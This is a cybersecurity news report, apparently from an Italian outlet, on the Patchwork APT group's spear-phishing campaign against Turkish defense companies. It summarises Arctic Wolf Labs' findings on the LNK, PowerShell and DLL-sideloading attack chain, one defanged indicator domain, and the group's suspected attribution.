Redazione RHC : 21 September 2025 20:53
The Patchwork group, also known by the aliases APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson , has launched a new spear-phishing campaign targeting the Turkish defense sector. The attackers’ primary goal, according to analysts, was to obtain sensitive information on developments in unmanned platforms and hypersonic weapons.
According to Arctic Wolf Labs , the attack chain consists of five stages and begins with the distribution of LNK (Windows shortcut) files disguised as invitations to an international conference on unmanned vehicles. These emails were addressed to employees of companies operating in the Turkish military-industrial complex , including a manufacturer of high-precision missiles .
The geopolitical context makes the attack particularly significant: its launch coincided with the deepening of military-technical cooperation between Turkey and Pakistan , as well as the escalation of the conflict between Pakistan and India. According to several analysts, Patchwork is acting in the interests of the Indian state and has been systematically attacking political and military targets in South Asian countries since 2009.
In early 2025, the same group launched a campaign against Chinese universities using energy-related documents as bait . It used a Rust- based downloader that decrypted and executed a C# Trojan known as Protego , designed to harvest data from infected computers.
The latest attack on Turkish defense organizations once again uses LNK files embedding PowerShell commands. The scripts initiate a connection to a remote server, expouav[.]org—the domain was registered on June 25, 2025, and is used as a payload distribution point. In addition to the malicious code , the site contains a PDF document mimicking an international conference, ostensibly referencing a real event held on the WASET platform. This allows the user to be distracted by a visually believable ” wrapper ” while the scripts run in the background.
Further actions lead to the loading of a DLL library, initiated via the DLL sideloading method, i.e., replacing a legitimate component in a trusted process. Its execution is initiated by a scheduled task in the Windows Task Scheduler , which launches the embedded shellcode. This module performs environmental reconnaissance: it collects system information, takes screenshots, and sends data to the C2 server.
A distinctive feature of the new operations is the use of 32-bit PE files instead of the previously used 64-bit DLLs . This indicates an evolution of the technical base and an attempt to increase the level of obfuscation: compact x86 binaries are easier to inject into trusted processes, and the architectural change complicates automatic threat detection.
Researchers also found evidence of overlap between Patchwork’s infrastructure and elements previously associated with the DoNot Team group (APT-Q-38, Bellyworm ), which could indicate tactical or logistical cooperation between the two Indian APT clusters.
The campaign against the Turkish defense industry marks an expansion of Patchwork’s focus, previously focused on South Asia. Given Turkey’s key role in the drone market ( the country accounts for approximately 65% of global exports ) and its ambition to develop hypersonic weapons, the Indian cyberespionage group’s activities appear strategically motivated.
Redazione